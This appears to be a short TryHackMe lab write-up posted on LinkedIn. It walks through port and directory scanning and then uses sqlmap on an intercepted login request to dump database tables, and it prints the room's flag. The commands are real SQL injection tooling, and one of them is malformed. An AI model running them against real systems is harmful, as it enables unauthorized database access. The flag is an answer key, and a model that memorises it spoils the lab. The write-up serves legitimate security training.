SQLMAP -TryhackMe Writeup

SQLMAP -TryhackMe Writeup

Vrijanandan Kumar Vrijanandan Kumar

Vrijanandan Kumar

Cyber Security Enthusiast || CTF Player || Security Researchers || Passionate about Securing the Digital World || CEH

发布日期: 2024年5月30日
+ 关注


Task 1: Introduction

What is Sqlmap ?

Sqlmap is an open-source penetration testing tool designed to automate the detection and exploitation of SQL injection vulnerabilities in web applications. SQL injection is a severe security flaw that allows attackers to manipulate the queries an application makes to its database. This can result in unauthorized data access, data modification, or even a complete takeover of the database. By automating the process, sqlmap helps security professionals efficiently identify and address these vulnerabilities, enhancing the security of web application

Task 3.SQLMap Challenge

Started by running the default Rustscan. 

rustscan -a 10.10.130.206 -A -sV -sC

I discovered that port 80 is open.

I accessed the website and found out this

Next I ran the?Gobuster?tool to find any available directories. 

gobuster dir -u https://10.10.130.206/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
I found? /blood


It had a login page and a registration option. I clicked on the login, then used Burp Suite to intercept the login page and saved it as a TXT file.

We now use SQLMap to enumerate the databases for usernames, passwords, and all other data that can be found in them.

To enumerate the current database

save file to sqlmap.txt

Now Run this command for flag 

 sqlmap -r <file_name> --current-user        
sqlmap -r <file_name> -D blood --tables
Here I FOUND TABLES 
sqlmap -r <file_name> -D blood -T flag --columns        
sqlmap -r <file_name> -D blood -T -C  flag,id --dump-all
Wow I found flag thm{sqlmap_is_love}

Thanks for visiting this my TryhackMe Walkthrough.

VRIJANANDAN KUMAR


Chandrabhushan Kumar

Senior InfoSec Analyst || eWPTXv2 || 10x CVE ||C|EH Master || OSCP Aspirant || Bug Hunter || CTF Player || Security Researchers || Pentester...

9 个月

Keep it up
回复
1 次回应

要查看或添加评论,请登录

Vrijanandan Kumar的更多文章

  • Red - TryHackMe Walkthrough
    2024年7月16日

    Red - TryHackMe Walkthrough

    https://tryhackme.com/room/redisl33t Initial Information Gathering We begin our reconnaissance phase with a Nmap scan.

  • Vulnversity — Walkthrough Tryhackme
    2024年7月4日

    Vulnversity — Walkthrough Tryhackme

    Introduction "Vulnversity" is an introductory level room on TryHackMe that covers various penetration testing…

    1 条评论
  • Library Tryhackme
    2024年7月3日

    Library Tryhackme

    Start the VPN you have downloaded and deploy the TryHackMe machine first. Then, ping and check the machine's…

    1 条评论
  • Seppuku | OffSec Writeup
    2024年6月28日

    Seppuku | OffSec Writeup

    Network scanning We used Nmap for port scanning. We used Nmap for port enumeration and discovered the following open…

    1 条评论
  • TryHackMe: Mr. Robot CTF
    2024年6月27日

    TryHackMe: Mr. Robot CTF

    Difficulty: Medium Room URL: https://tryhackme.com/room/mrrobot Scanning It was known that port 80, 443 and 22 were…

  • Tryhackme-GmingServer Walkthrough
    2024年6月3日

    Tryhackme-GmingServer Walkthrough

    Network Enumeration I started the network enumeration by running a port scan using rustscan looking for open ports and…

  • Lazy Admin TryhackMe
    2024年6月2日

    Lazy Admin TryhackMe

    Easy Linux machine to practice your skills Enumeration I started a Rustscan scan and found both an SSH service and a…

  • Katana Walkthrough (offsec_lab)
    2024年5月29日

    Katana Walkthrough (offsec_lab)

    https://portal.offsec.

  • MoneyBox (Vulnhub WalkThrough)
    2024年5月28日

    MoneyBox (Vulnhub WalkThrough)

    MoneyBox (Vulnhub WalkThrough) Today I’m going to solve challenge MoneyBox Vulnhub WalkThrough. Offensive Security Edit…

  • Gaara Vulnhub(walkthrough)
    2024年5月28日

    Gaara Vulnhub(walkthrough)

    Gaara Vulnhub(walkthrough) 01.) Target Discovery with Nmap 02.

社区洞察

其他会员也浏览了